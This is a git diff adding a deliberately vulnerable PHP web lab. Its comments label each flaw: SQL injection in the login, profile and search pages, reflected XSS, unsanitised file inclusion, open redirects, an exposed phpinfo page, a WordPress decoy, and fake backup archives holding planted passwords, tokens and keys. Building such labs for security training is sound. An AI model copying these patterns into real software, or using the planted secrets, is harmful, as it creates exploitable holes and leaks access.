+$dbh = @new mysqli(getenv('DB_HOST') ?: 'db', 'root', getenv('DB_PASS') ?: 'toor', getenv('DB_NAME') ?: 'newploit');
+
+$user = $_POST['username'] ?? $_POST['user'] ?? '';
+$pass = $_POST['password'] ?? $_POST['pass'] ?? '';
+$csrf = bin2hex(random_bytes(8));
+$err  = '';
+$ok   = false;
+
+if ($user !== '' || $pass !== '') {
+    $sql = "SELECT id, username, role FROM users WHERE username='$user' AND password='$pass'";
+    if ($dbh && !$dbh->connect_errno) {
+        $res = @$dbh->query($sql);
+        if ($res === false) {
+            $err = $dbh->error;
+        } else {
+            $row = $res->fetch_assoc();
+            if ($row) {
+                $ok = true;
+                setcookie('session', base64_encode(json_encode($row)), time() + 3600, '/');
+                header("Location: /admin/?welcome=" . urlencode($row['username']));
+                exit;
+            } else {
+                $err = "Invalid username or password";
+            }
+        }
+    } else {
+        $err = "Database unavailable";
+    }
+}
+
+// Open redirect on `next` param.
+$next = $_GET['next'] ?? $_GET['url'] ?? '';
+if ($next !== '' && $user === '' && !$ok) {
+    header("Location: $next", true, 302);
+    exit;
+}
+?><!DOCTYPE html>
+<html><body>
+<h1>Member login</h1>
+
+<?php if ($err): ?>
+<p style="color:red"><?= htmlspecialchars($err) ?></p>
+<?php endif; ?>
+
+<form method="post" action="/login.php">
+    <input type="hidden" name="csrf" value="<?= $csrf ?>">
+    <p><label>username <input name="username" value="<?= htmlspecialchars($user) ?>"></label></p>
+    <p><label>password <input name="password" type="password"></label></p>
+    <p><button type="submit">sign in</button></p>
+</form>
+
+<p><a href="/wp-login.php">blog login</a> &middot; <a href="/admin/">admin</a></p>
+</body></html>
diff --git a/vuln-lab/web/www/out.php b/vuln-lab/web/www/out.php
new file mode 100644
index 0000000..6ccb8bf
--- /dev/null
+++ b/vuln-lab/web/www/out.php
@@ -0,0 +1,3 @@
+<?php
+$target = $_GET['dest'] ?? $_GET['url'] ?? '/';
+header("Location: $target", true, 302);
diff --git a/vuln-lab/web/www/page.php b/vuln-lab/web/www/page.php
new file mode 100644
index 0000000..f512294
--- /dev/null
+++ b/vuln-lab/web/www/page.php
@@ -0,0 +1,17 @@
+<?php
+// LFI — path traversal, php:// filter, allow_url_include.
+$page = $_GET['page'] ?? $_GET['file'] ?? $_GET['template'] ?? 'home';
+
+// strip trailing .php if user didn't add it
+$target = $page;
+if (!preg_match('/\.(php|html|txt|log)$/', $target) && strpos($target, '://') === false) {
+    $target .= '.php';
+}
+
+echo "<!DOCTYPE html><html><body>";
+echo "<h1>Pages · $page</h1><hr>";
+
+// No sanitization at all — directly include.
+@include($target);
+
+echo "</body></html>";
diff --git a/vuln-lab/web/www/phpinfo.php b/vuln-lab/web/www/phpinfo.php
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/vuln-lab/web/www/phpinfo.php
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
diff --git a/vuln-lab/web/www/profile.php b/vuln-lab/web/www/profile.php
new file mode 100644
index 0000000..076e41e
--- /dev/null
+++ b/vuln-lab/web/www/profile.php
@@ -0,0 +1,35 @@
+<?php
+// Integer-based SQLi — no quotes, full pipeline (error/bool/union/time).
+$dbh = @new mysqli(getenv('DB_HOST') ?: 'db', 'root', getenv('DB_PASS') ?: 'toor', getenv('DB_NAME') ?: 'newploit');
+
+$id = $_GET['id'] ?? '1';
+
+$sql = "SELECT id, username, email, role FROM users WHERE id=$id";
+$row = null;
+$err = '';
+if ($dbh && !$dbh->connect_errno) {
+    $res = @$dbh->query($sql);
+    if ($res === false) {
+        $err = $dbh->error;
+    } else {
+        $row = $res->fetch_assoc();
+    }
+}
+?><!DOCTYPE html>
+<html><body>
+<h1>User profile #<?= htmlspecialchars($id) ?></h1>
+
+<?php if ($err): ?>
+<pre style="color:#c00">You have an error in your SQL syntax: <?= $err ?>
+<?= htmlspecialchars($sql) ?></pre>
+<?php elseif ($row): ?>
+<p>User found:</p>
+<ul>
+    <li>username: <?= htmlspecialchars($row['username'] ?? '') ?></li>
+    <li>email:    <?= htmlspecialchars($row['email'] ?? '') ?></li>
+    <li>role:     <?= htmlspecialchars($row['role'] ?? '') ?></li>
+</ul>
+<?php else: ?>
+<p>No such user.</p>
+<?php endif; ?>
+</body></html>
diff --git a/vuln-lab/web/www/public_html.zip b/vuln-lab/web/www/public_html.zip
new file mode 100644
index 0000000..53d81c9
--- /dev/null
+++ b/vuln-lab/web/www/public_html.zip
@@ -0,0 +1,12 @@
+PK archive: public_html.zip — cpanel backup
+includes: home/newploit/public_html/* and home/newploit/mail/*
+Generated: 2024-05-02
+Cpanel version: 110.0 (Newploit shared host)
+credentials in backup/cpanel-auth.txt:
+  user: newploit
+  pass: cPan3l_Pw2024!
+  api_token: cpanel_newploit_realtoken
+Padding padding padding padding padding padding padding padding padding padding
+Padding padding padding padding padding padding padding padding padding padding
+Padding padding padding padding padding padding padding padding padding padding
+Padding padding padding padding padding padding padding padding padding padding
diff --git a/vuln-lab/web/www/redirect.php b/vuln-lab/web/www/redirect.php
new file mode 100644
index 0000000..ae991f0
--- /dev/null
+++ b/vuln-lab/web/www/redirect.php
@@ -0,0 +1,5 @@
+<?php
+// Open redirect — accepts any url/to/dest/next param.
+$target = $_GET['url'] ?? $_GET['to'] ?? $_GET['dest'] ?? $_GET['next'] ?? '/';
+header("Location: $target", true, 302);
+echo "redirecting to $target";
diff --git a/vuln-lab/web/www/robots.txt b/vuln-lab/web/www/robots.txt
new file mode 100644
index 0000000..f326b5e
--- /dev/null
+++ b/vuln-lab/web/www/robots.txt
@@ -0,0 +1,19 @@
+User-agent: *
+Disallow: /admin/
+Disallow: /administrator/
+Disallow: /wp-admin/
+Disallow: /wp-login.php
+Disallow: /backup.sql
+Disallow: /backup.zip
+Disallow: /db.sql
+Disallow: /dump.sql
+Disallow: /.env
+Disallow: /.git/
+Disallow: /phpinfo.php
+Disallow: /api/
+Disallow: /cgi-bin/
+Disallow: /secret/
+Disallow: /internal/
+Disallow: /private_config.json
+Disallow: /s3_migration.sh
+Sitemap: https://insecure.newploit.com/sitemap.xml
diff --git a/vuln-lab/web/www/search.php b/vuln-lab/web/www/search.php
new file mode 100644
index 0000000..5bcbf3d
--- /dev/null
+++ b/vuln-lab/web/www/search.php
@@ -0,0 +1,51 @@
+<?php
+// Reflected XSS + SQLi on `q` and `id`.
+$dbh = @new mysqli(getenv('DB_HOST') ?: 'db', 'root', getenv('DB_PASS') ?: 'toor', getenv('DB_NAME') ?: 'newploit');
+
+$q    = $_GET['q']    ?? '';
+$cat  = $_GET['cat']  ?? '';
+$sort = $_GET['sort'] ?? 'id';
+
+$sql = "SELECT id, name, price, description FROM products WHERE name LIKE '%$q%'";
+if ($cat !== '') $sql .= " AND category='$cat'";
+$sql .= " ORDER BY $sort";
+
+$rows = [];
+$err = '';
+if ($dbh && !$dbh->connect_errno) {
+    $res = @$dbh->query($sql);
+    if ($res === false) {
+        $err = $dbh->error;
+    } else {
+        while ($r = $res->fetch_assoc()) $rows[] = $r;
+    }
+}
+?><!DOCTYPE html>
+<html><body>
+<h1>Search results for: <?= $q /* XSS: reflected unescaped */ ?></h1>
+
+<form method="get">
+    <input name="q" value="<?= $q ?>" placeholder="search">
+    <input name="cat" value="<?= $cat ?>" placeholder="category">
+    <button>go</button>
+</form>
+
+<?php if ($err): ?>
+<pre style="color:red">SQL error: <?= $err ?>
+Query: <?= htmlspecialchars($sql) ?></pre>
+<?php endif; ?>
+
+<table border=1>
+<tr><th>id</th><th>name</th><th>price</th><th>description</th></tr>
+<?php foreach ($rows as $r): ?>
+<tr>
+    <td><?= $r['id'] ?></td>
+    <td><?= $r['name'] ?></td>
+    <td><?= $r['price'] ?></td>
+    <td><?= $r['description'] ?></td>
+</tr>
+<?php endforeach; ?>
+</table>
+
+<p><?= count($rows) ?> result(s)</p>
+</body></html>
diff --git a/vuln-lab/web/www/site.zip b/vuln-lab/web/www/site.zip
new file mode 100644
index 0000000..34580af
--- /dev/null
+++ b/vuln-lab/web/www/site.zip
@@ -0,0 +1,16 @@
+PK archive: site.zip snapshot — newploit-site
+contents:
+  site/index.php
+  site/search.php
+  site/login.php
+  site/admin/index.php
+  site/admin/config.php
+  site/wp-login.php
+  site/wp-content/debug.log
+  site/api/auth.php
+  site/api/user.php
+  site/.env
+Note: archive produced by nightly backup cron.
+Total size (uncompressed): 18.4 MB. Size (compressed): 5.2 MB.
+Padding padding padding padding padding padding padding padding padding padding
+Padding padding padding padding padding padding padding padding padding padding
diff --git a/vuln-lab/web/www/wp-admin/index.php b/vuln-lab/web/www/wp-admin/index.php
new file mode 100644
index 0000000..70f3f1a
--- /dev/null
+++ b/vuln-lab/web/www/wp-admin/index.php
@@ -0,0 +1,2 @@
+<?php
+header("Location: /wp-login.php?redirect_to=/wp-admin/", true, 302);
diff --git a/vuln-lab/web/www/wp-login.php b/vuln-lab/web/www/wp-login.php
new file mode 100644
index 0000000..b13fa6c
--- /dev/null
+++ b/vuln-lab/web/www/wp-login.php
@@ -0,0 +1,17 @@
+<?php
+// WordPress login decoy — sends the right html markers for wp fingerprinting.
+header("X-Powered-By: WordPress/6.4.2");
+?><!DOCTYPE html>
+<html><head>
+<title>Log In &lsaquo; Newploit Blog &mdash; WordPress</title>
+<meta name="generator" content="WordPress 6.4.2">
+</head><body class="login wp-core-ui">
+<div id="login">
+<h1><a href="https://wordpress.org/">WordPress</a></h1>
+<form name="loginform" id="loginform" action="/login.php" method="post">
+    <p><label>Username or Email Address<br><input type="text" name="log" id="user_login"></label></p>
+    <p><label>Password<br><input type="password" name="pwd" id="user_pass"></label></p>
+    <p class="submit"><input type="submit" name="wp-submit" value="Log In"></p>
+</form>
+</div>
+</body></html>
diff --git a/vuln-lab/web/www/www.zip b/vuln-lab/web/www/www.zip
new file mode 100644
index 0000000..5f4e19d
--- /dev/null
+++ b/vuln-lab/web/www/www.zip
@@ -0,0 +1,10 @@
+PK archive: www.zip — full webroot snapshot
+contents: same as site.zip plus /tmp/php_sessions/ and /var/log/apache2/
+sha256: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b
+Note: do NOT expose. left here from 2024-06 migration.
+DB_PASSWORD=toor
+JWT_SECRET=secret
+APP_KEY=base64:UGE5a1A2eTgvV0xnRUN1TUc1Q3U3b2kydzBvWkFiV3A=
+Padding padding padding padding padding padding padding padding padding padding
+Padding padding padding padding padding padding padding padding padding padding
+Padding padding padding padding padding padding padding padding padding padding